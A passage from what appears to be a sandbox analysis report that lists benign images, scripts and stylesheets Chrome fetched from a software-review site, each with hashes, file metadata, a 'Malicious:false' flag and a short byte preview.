                                                                                                                                                                                                        Preview:......JFIF.....H.H........................................................#...#*%%*525EE\..................................................#...#*%%*525EE\...... . .."..........,........................................................Qf.....J...w..P......%......................!...1....A.ab........?.....y.$h..;7J.d...:<..#.......de.X...`..v1.u..y..i.%].[i..... q.\. .=F<O.p.....)-..|....v..^..#.......3.....8.c<g..L.....j./...Sx.ZwdB...p..b......c^.o5[..>.q.}.....8..J8.~L.+...."..g<..H.Vd.7...*..V..}..1f.I......K3..I?d............................!........?.kt...<.....h.m...........................1.........?.....HU..s..Q'g...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):20271
                                                                                                                                                                                                        Entropy (8bit):7.987283177953972
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:+z0OYuYCQdy4qJBsCQozyyunk+wYnawxE6/go3kTqHa4YfzGtXswg:+z05d1kyyGk+wwL78q+fulg
                                                                                                                                                                                                        MD5:50EB63BBAC3DC9135748243FD2854199
                                                                                                                                                                                                        SHA1:4349DDE55952921021F375823201393E145B07E1
                                                                                                                                                                                                        SHA-256:E6C2CB67CCF0A8479F18A24EA436177D5AE3BFEE9EC5129E66DD76484523A731
                                                                                                                                                                                                        SHA-512:8FA19D5C39DC58B7233B0B67671C0993AE8968BD2796B358AAACA746AA7D865D6DCB04BDBAF4C7FA8CB87CCD1F4548383882DD38062F203B157B91B93F432F0E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://i.vimeocdn.com/video/588275950-244fb2cb9bf09fea29744f33a17f6ccc6b086555648aa37316f32f0d6be2da70-d_640
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............N....(iinf..........infe........av01Color....jiprp...Kipco....ispe...........h....pixi............av1C........colrnclx...........ipma.................N.mdat.....f'.;..4..2....O..0....!.IcO.!.....Q.q....\-Z)._Fx.7E..\..`.l.k.C^.g..5...7........U.|Hj\..C.=...8.......\...".......2;.VD0..!E..$......7..)...3.bMd....(fJ...9.DC.n..c.....k.W|...WW.`m.D.v..0...|.A/X..M..n...j...B..O......."Mn--g.B..+"..y...)O.......p.u..A..M.+.}j..6.`^...;..|...........o.ez..Q..G....&+5<.@.QY...S......... ..\o.[I.x...'"./.....0..!.Q..<.F5E...........'....Z/8.#..B.....8;...F.F=.Zz.c-.[....,..00}4..3.w......*.tb@......&w....j..P".R..i..4.g.i..2Y......:DKx.2........xf.:Z..\...8.g_.;......rh...r..6h.>.:}..E|..J.>Z..Q..p.../....!..b/~...:..')...N....D..e..%../..#...&.7..{...........E...I.....6..E}.E....0B+.e`.X8./...~".C..W...F.p[K....R..M.J..Y.,.*..W.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4128
                                                                                                                                                                                                        Entropy (8bit):7.133633501103921
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jDc5N26MT0D5MdtbZPAVwzVHloYW1Bq6:+03coYNMtKw/oY+06
                                                                                                                                                                                                        MD5:530E20DB15F5CA38B91A70CF69BEEF3D
                                                                                                                                                                                                        SHA1:36270C92E9AD84DF3A1864A1EC186B5E34F7D912
                                                                                                                                                                                                        SHA-256:06EE904921F3F990783E6416CA19CDED4ABF4BF7C08CAA0F34F40BB0CD4F52AF
                                                                                                                                                                                                        SHA-512:1BC9845838FE95D952838F74F3FFE08C7DCAB9ABCFB6C8151D758A7DDDE772BB480D94A84100D9C3A8D5924843ABD901042FA15AA2C33F50A5AF507C01D81F38
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/9efb2a2f-43b2-4ebd-bf24-b9bb46bd93c6.jpeg?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o.......(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3600
                                                                                                                                                                                                        Entropy (8bit):7.788921960995258
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+zCjgEo3czlgIjcU7Eu4zHaU6plcGscwF:+zCkEoklNjcUAzHaU6TrsZF
                                                                                                                                                                                                        MD5:53680739A67F2FD40E8FEC420DF6AD76
                                                                                                                                                                                                        SHA1:E5491B858E06B2F4425E85C21A5887E8B565CD9E
                                                                                                                                                                                                        SHA-256:F25B5103F925DD873946B19C3429595BC4C16FEC6623539A8303B30CBF00C928
                                                                                                                                                                                                        SHA-512:E43026026160B276C1D972048C0DF37282926DFEE9356024C8B47F421E7C2A6C313B1E98A7733CAFF2E7FFC0EA721A2039FA803A88E84B0C108C8EBDF9852F70
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/5152f7c6-61ed-4168-b89f-f436d97ebccd.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D................k.................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe................pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma.........................cmdat.........2......P./.TU..../t.Q..Z...W...]5...1%p.....5[.....U..R.a.1.w._&j.0M=..O..h.......}P2g....a..8.!Ka.d.....-.g~...D...K.o......<1.S.@....e...$pv....x...;@?.J2....>....q..^...f0.D..Oqy<.Q..V.4.[......`Fg.iql.Z..?.Q.Y-W....^F~".f.......eAx..^....q.5\5X........uL.2.9..*....U......k....g..J...3...-..+6.S.x.f.#.A...q......6....R..}..T9p..@.h....1j..X...ItA^.wJX-.Zo.q.........-..K..w..4q.f....d.....=.....b.......~a.S...fm..E..J..|..9G..c.AKo.z..gS.Z ....@c.-...,5...........;.Y...h...cC..^.+.^...U=..]G.*+.T..]]}F...iy1.@l'[
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5762
                                                                                                                                                                                                        Entropy (8bit):7.381835553558921
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7jE5N26MT0D5MdtbZPAVwzVJOBzFNcXMtjFrSakAAiCDHp:+74oYNMtKwXmNLrSakYCzp
                                                                                                                                                                                                        MD5:89630404139BBC0B962E4A29536C90B1
                                                                                                                                                                                                        SHA1:6C8FCE2DCE49F9C450D8E7EBE521DEC6C3AAE0CB
                                                                                                                                                                                                        SHA-256:8B2978FE6B8B65BC7FA4A2B971FF233795CB09A84EC6D5C422A391ACC0502260
                                                                                                                                                                                                        SHA-512:956B47F0852004985F261B53623DFB6DD96EE48BBB4345710991F222978BCA4708E71D734AAEA3F7BFD8DEE3277DF7D7BA6C6E42BA9A0FFD2375D00A758C2137
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/ed3785e7-b737-401b-819f-b042945c26a2.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..............................y...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3172), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3172
                                                                                                                                                                                                        Entropy (8bit):5.269660294088833
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:fb2mfU+PzbtxJFcX0aTgRyw/QtzbQ5dbMj2UC1T+mlxC9H7X9yRy:G+fJF5x/QXUhH0muVN
                                                                                                                                                                                                        MD5:51A8E5389A9E376C3FA55815E028B144
                                                                                                                                                                                                        SHA1:222C2A38F0B256500C543FFE764EAA8F19D4B457
                                                                                                                                                                                                        SHA-256:62C357E57C33404791BED8B627D5C08794BD6CF9036577E1E7C94CA65A43DB57
                                                                                                                                                                                                        SHA-512:4A134F7E8520CCAA8782E22149BF642E085979BDC1C7E3B469E15721864257F1BAB8338B045A6412D14F3CEDD12C81C3A4BC2184409A8575197B2E72AC81E40B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8977],{78977:function(r,s,e){"use strict";e.r(s),e.d(s,{default:function(){return C}});var x=e(52322),a=e(2784),c=e(40489),t=e(6495),l=e(78283),n=e(25632),d=e(13163),i=e(19357),m=e(26931),o=e(11228),j=e(13980),h=e.n(j);let p={"secondary-1":"#062F42","secondary-2":"#04344B","secondary-3":"#043A54"},u=r=>{let{className:s="",color:e,children:a}=r;return(0,x.jsx)("div",{className:"rx-p-lg rx-text-center rx-w-full md:rx-w-1/3 rx-flex rx-flex-col rx-justify-center rx-items-center ".concat(s),style:{background:p[e]},children:a})};u.propTypes={className:h().string,color:h().string,children:h().node};var N=e(13473),f=e.n(N),C=()=>{let{ssrProps:{hasIncentives:r}}=(0,i.bN)(),[s,e]=(0,a.useState)(!1);return(0,x.jsxs)(x.Fragment,{children:[(0,x.jsxs)("div",{className:(0,c.Z)("rx-w-full","rx-bg-primary-100",f()["capterra-hero--wrapper"]),"data-testid":"hero-component",children:[(0,x.jsx)(t.Z,{children:(0,x.jsxs)("div",{className:"md:rx-w-2/3 r
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):653
                                                                                                                                                                                                        Entropy (8bit):6.49857956422906
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:+cK/gj6qWxaFBzC6lhri2F9Fl7JLiIr/ZmT1+8OFuIJxVli+:+cKYj6LQzPlTFPr/QTSIUxLi+
                                                                                                                                                                                                        MD5:14E10309DD9335FF4F09148E2F168B0C
                                                                                                                                                                                                        SHA1:B97574E6FD476A62A5C1A1C9E12D064D82D8940E
                                                                                                                                                                                                        SHA-256:1E780131355A83E58B786D17BA3F4761D21DAD012C06A919198D792CA10494DF
                                                                                                                                                                                                        SHA-512:A9D858F1FBBE6040B642F7320108F83941CF35D7260CAF0ABAAED4B7F27CE4F3C4D1BA9ADDB9B3D2980CD5ADBFE4475CB9A687F198A669110C9AD8C6F6F01E9D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/e4a33fab-dc7a-4869-b53e-a3876430e9cb.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................s...(iinf..........infe........av01Color....jiprp...Kipco....ispe....... ... ....pixi............av1C........colrnclx...........ipma..................{mdat......?...h4 2......0.....W&.L.~rG.+.s... &....c.t[..w:..^.......`..HB..sB&.n&...H9b.H...xb...P.....&1.>n.F.n..d.dH...X&.g...+.:.n=..eX~&Z.`..#l....t....Y.qr.{v........c('...(..V..NKN..$.)X.B..E...........O.:.7...>.......>.vEUv.WB.w0..kX...Oi..h'W.BX.. )'..rie..E........?..)".-.Y..mz.(..[..@..n.g...2..c.....=.A..f`^/.U.....Z#e8....,.........8.....,.m.C
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):34485
                                                                                                                                                                                                        Entropy (8bit):6.043940999634818
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:xVFVGRVBx/CbTx2Oc3lOKvdf5hDTOeELmAaHs7FNV0JaNY:SVKbTx2mKpvTtEdaCbVSaq
                                                                                                                                                                                                        MD5:4C50AEE008CE437EB4B8E62E720D71D8
                                                                                                                                                                                                        SHA1:184064A809EF17D0D9DE4207EB5F9B58BEE99144
                                                                                                                                                                                                        SHA-256:5D4F370F357D2703D5071F1BADAB2C33A8B6D496F36873F0614A53D83F67D41F
                                                                                                                                                                                                        SHA-512:DF9147899346D057E80CF25DCD6CF1AA02E84484E20DDEFF332B9088DFBBA62FDD797D101E521FA6E3301E7CF2A71465A358966AFEE764743ADB058AF5C65823
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>7</title>. <defs>. <path d="M10.0731707,0 L107.926829,0 C113.490088,0 118,4.50991215 118,10.0731707 L118,107.926829 C118,113.490088 113.490088,118 107.926829,118 L10.0731707,118 C4.50991215,118 0,113.490088 0,107.926829 L0,10.0731707 C0,4.50991215 4.50991215,0 10.0731707,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" i
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (18020)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):274032
                                                                                                                                                                                                        Entropy (8bit):5.55100115424866
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:YsX21YbrjYdB6s9EMYwV0mHrJ5Cz+joJW373jXlEZtNAJ0+q3ji6:p21SAdB6siMHFlEZtNAJ0+qj
                                                                                                                                                                                                        MD5:8CA35E86FFAE5ACB2B809A24C84611CB
                                                                                                                                                                                                        SHA1:9FA1E9E4FF12E029BF9F675091CB410C62894849
                                                                                                                                                                                                        SHA-256:37A83D8BC3CA0C3A474E0FE0B59D9D2696C5524404FC9EFB8356D5EDF47A31DA
                                                                                                                                                                                                        SHA-512:24A07671D0848183F11BAB80FEFAF73DBCFDA6A6474D3A92146F3C94F958CD1FD9DEEA94DA677F35223B4E16AE91D560842F4327DC238A04A095C0848E6D33A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtm.js?id=GTM-PCRVH5V
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"40",. . "macros":[{"function":"__e"},{"function":"__e"},{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__v","vtp_name":"gtm.elementClasses","vtp_dataLayerVersion":1},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-52597090-1","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__aev","vtp_varType":"TEXT"},{"function":"__v","vtp_name":"gtm.elementId","vtp_dataLayerVersion":1},{"function":"__u","vtp_component":"PATH","vtp_enableMulti
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (24823), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24823
                                                                                                                                                                                                        Entropy (8bit):4.792811205299742
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:+Z8C4hGoFpHwAuLlCS7FGAVsq1nwGfg4xqsQMPNE:JlMuJ
                                                                                                                                                                                                        MD5:E04AD89975C535B30BAE773D0EB0D3B2
                                                                                                                                                                                                        SHA1:0C72555D0FD844150B6EC407A57DA2D29BF380E2
                                                                                                                                                                                                        SHA-256:06C0EDBFC1B871FB45195265F5FAAD3E23191305F6FF2125557A9FBC287C8992
                                                                                                                                                                                                        SHA-512:6044553C64225C3F3F2AA5EF866BF55B1148CD5B7FE1A668417BF9BC24B70BB7C10048049C2201D986A28CFF85B1A93CE673CBF687FA4B8BE2DAEB5B8C6B73D7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:#onetrust-banner-sdk{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}#onetrust-banner-sdk .onetrust-vendors-list-handler{cursor:pointer;color:#1f96db;font-size:inherit;font-weight:bold;text-decoration:none;margin-left:5px}#onetrust-banner-sdk .onetrust-vendors-list-handler:hover{color:#1f96db}#onetrust-banner-sdk:focus{outline:2px solid #000;outline-offset:-2px}#onetrust-banner-sdk a:focus{outline:2px solid #000}#onetrust-banner-sdk #onetrust-accept-btn-handler,#onetrust-banner-sdk #onetrust-reject-all-handler,#onetrust-banner-sdk #onetrust-pc-btn-handler{outline-offset:1px}#onetrust-banner-sdk.ot-bnr-w-logo .ot-bnr-logo{height:64px;width:64px}#onetrust-banner-sdk .ot-tcf2-vendor-count.ot-text-bold{font-weight:bold}#onetrust-banner-sdk .ot-close-icon,#onetrust-pc-sdk .ot-close-icon,#ot-sync-ntfy .ot-close-icon{background-size:contain;background-repeat:no-repeat;background-position:center;height:12px;width:12px}#onetrust-banner-sdk .powered-by-logo,#onetrust-banner-sdk .ot-pc-fo
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):539
                                                                                                                                                                                                        Entropy (8bit):6.049835245801683
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:+cK/gj6qWQYaFBzC6l7g+6IKX9tsBWwqyqqbKDff:+cKYj6LQZz1cIeDwyHDff
                                                                                                                                                                                                        MD5:0C4298D0CEAEC9EE777C3F198E00B2B6
                                                                                                                                                                                                        SHA1:9F9E628DCDA0EFD1C77530B30B0001D9EBE49BB7
                                                                                                                                                                                                        SHA-256:5AEB08672B9B802043A668FF6D69B7F6EE2502997A7874B843AC8A3C14028A80
                                                                                                                                                                                                        SHA-512:A82FEA87D598C52342C6C9F5DA77E74AEBC77FA62057674A3F0D3F718A6B9F7649A80B7776CC67B6956EF51357CCC87701B1597C1D00323F55B85806E6B557EC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/a67f601c-1c43-4480-8665-f74fae6e4252.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe....... ... ....pixi............av1C........colrnclx...........ipma...................mdat......?...h4 2......0......x-.f.ZW{.....a..{>...*O......d.D.v=..\bHCe..*3CbW.].;...z.......wn.T...*.1g..nk0...;s.x.'.&.=8..P.=....I.C.I...xT .f.T.......;..Y..h.4..X.X..J.....q.[..RI2...ucI-....`DYl.P.#R..\.vw.y(..f....4B=..;.*X/..n. W......jgpr..D
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1957)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3093
                                                                                                                                                                                                        Entropy (8bit):5.586837107167901
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:D4z+y/clUyAQHWs5+TaorOFzyHOgeEh7z5jFqxv4tk5YHIeklw9DuExjGx:0+5AQHAray48f5JMYHIq9Du9
                                                                                                                                                                                                        MD5:E4E48D634B312C6DF47616CFE271E535
                                                                                                                                                                                                        SHA1:B9120BE67DE522BEE6D565D2915DD540F1CF8332
                                                                                                                                                                                                        SHA-256:2257BE8C4862C820E598FE4CAC53A4CBF311C422811931C6C9B173255BD75A77
                                                                                                                                                                                                        SHA-512:79B7C481BFAA7460E5F0B9867583F378717A3E613D3C5E4D0639BB416655E2202C06A35F5B49D82FA6541566E38036A844B83F07E9CA8D7997C585681BD25459
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:/*1725034542,,JIT Construction: v1016108272,en_US*/../**. * Copyright (c) 2017-present, Facebook, Inc. All rights reserved.. *. * You are hereby granted a non-exclusive, worldwide, royalty-free license to use,. * copy, modify, and distribute this software in source code or binary form for use. * in connection with the web services and APIs provided by Facebook.. *. * As with any software that integrates with the Facebook platform, your use of. * this software is subject to the Facebook Platform Policy. * [http://developers.facebook.com/policy/]. This copyright notice shall be. * included in all copies or substantial portions of the software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS. * FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR. * COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER. * IN AN ACTION OF CO
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9985)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11145
                                                                                                                                                                                                        Entropy (8bit):5.359425009481445
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ebvcZuS5tmjHC/tM0fVUISMVnRNIN0Y1oZD5Z:ebvcuRjENfVUvN11oZD5Z
                                                                                                                                                                                                        MD5:B30F074CD7F59B1B60B0526838DAE4CF
                                                                                                                                                                                                        SHA1:99E5E522374E5B854CB162D244482CEDE09E48A2
                                                                                                                                                                                                        SHA-256:6180CE88C634D9DA036B03B3E25EE5453D39299A045F125E001332E33655EEB8
                                                                                                                                                                                                        SHA-512:695106F151EE0D9D8D8141B52CAFB80D623EAA36F0499CD45BF15F8BC5CB45CD66445B3F7A485DCD2B2202E8158BFAA488D7F0F703CC0F87288DC0CBE9EB75FD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://static.hotjar.com/c/hotjar-2431713.js?sv=7
                                                                                                                                                                                                        Preview:window.hjSiteSettings = window.hjSiteSettings || {"site_id":2431713,"r":0.4663716178902116,"rec_value":0.205,"state_change_listen_mode":"automatic","record":true,"continuous_capture_enabled":true,"recording_capture_keystrokes":true,"session_capture_console_consent":false,"anonymize_digits":true,"anonymize_emails":true,"suppress_all":false,"suppress_all_on_specific_pages":[],"suppress_text":false,"suppress_location":false,"user_attributes_enabled":true,"legal_name":null,"privacy_policy_url":null,"deferred_page_contents":[],"record_targeting_rules":[],"feedback_widgets":[],"heatmaps":[],"polls":[],"integrations":{"optimizely":{"tag_recordings":false},"abtasty":{"tag_recordings":false},"mixpanel":{"send_events":false},"unbounce":{"tag_recordings":false},"google_optimize":{"tag_recordings":false},"hubspot":{"enabled":false,"send_recordings":false,"send_surveys":false}},"features":["settings.billing_v2","survey.embeddable_widget","feedback.widgetV2","survey.type_button","survey.screenshots"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 300 x 42, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8876
                                                                                                                                                                                                        Entropy (8bit):7.912328495402911
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:beqmzSCWfMMNxEoyEcoSeiM7jE71PiJscLnUrCSDeQMME:beqm2fTbEREM2jEpPLcYCTQTE
                                                                                                                                                                                                        MD5:C2C70DF4C28E97C5FA3FD5EF2CC61D0E
                                                                                                                                                                                                        SHA1:17631C1D165E53BD756DCAEE775B166DBEC97B6B
                                                                                                                                                                                                        SHA-256:7446299C8ECAC64E6AAEBD803039B03C4283C14C0C50CA3486A3CE80D0974F4F
                                                                                                                                                                                                        SHA-512:547DAC789002B185617330D95F6DAACF6622A2918EA5596405675D37C70473AAEE6D129EC1FE338B62A61C375607363B762B185BD386EF59C5CE6453A3DFDFE2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...,...*......Sf.....pHYs..........+.... .IDATx..]{...u.....j..X...8.r].:....C...2sy?...$@.u..IJ.."'%..4....;$<..3@...8..B....\.,.ZY.eY...Z..?.......Jm.....}.8.8s...f..4....Dt.o.CD....=7].:....1'kI;..,.?$._.T.c.K...[k.........X.`:3...3...v..2.SD...Q.TtL..$..v..N.1.SZ.^..*o.8+i..M....&S......:.(4Q.w....D....[I9%.>.,&.N.../i.T...*./...`...>KD...df.Q.nG}..?..m...y#...Z...\..CmPG........T.....~.y.i....~G....).'.us.1.iK....S.)..ZJ.R&9..+...:..Z...Z...2..u..t.le.{..I..XnQ+..7......9.w..,..1.S.u.B..].?....du,.Hzq..N.:.i.^)....RZ.:...T..D)..(.~f....0.._..(...&.1f~..Vk....G.UX.:.c.M.N%..T.;..P..M.....r.nn.p.'.V....SG.R....I[..KV*q...<........U...r..m.W..Va[...K[.X..`..z.X.S)...O#.o.L.....7.>.....D.H....N..%.\N.^.-.G..}......<..r..3.Q6.............g....Fl....c..]*...,..;.<c...2...yC......14&K...Si.%.&5~j..V..|}.X...&|.$/Q..Q..Q.u._.l..s:...8U.|G~..q......w..........a..6q...P..y...i.%./d.MF.RYc.Uj..-.1."5Wcs-Vo.}r.....fm.__.:.E.JL.:..^
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):152155
                                                                                                                                                                                                        Entropy (8bit):5.231586341792799
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:AOLMWBDYJNZGTugHZdvh1B7WJQgLBdyCBlYTql33c6OuSSlHtRzI3Y7B:HLDTpvCvYTyhlHtRI3Y7B
                                                                                                                                                                                                        MD5:FD1598280E49AE07C15F156A363BA610
                                                                                                                                                                                                        SHA1:7483BC20D09EACD74F77C91A26CD6BB2A3272B92
                                                                                                                                                                                                        SHA-256:3201B5E27DC03E67530643DB5E4F692DAC4039C2C8C84D7A9C1257805628B9D2
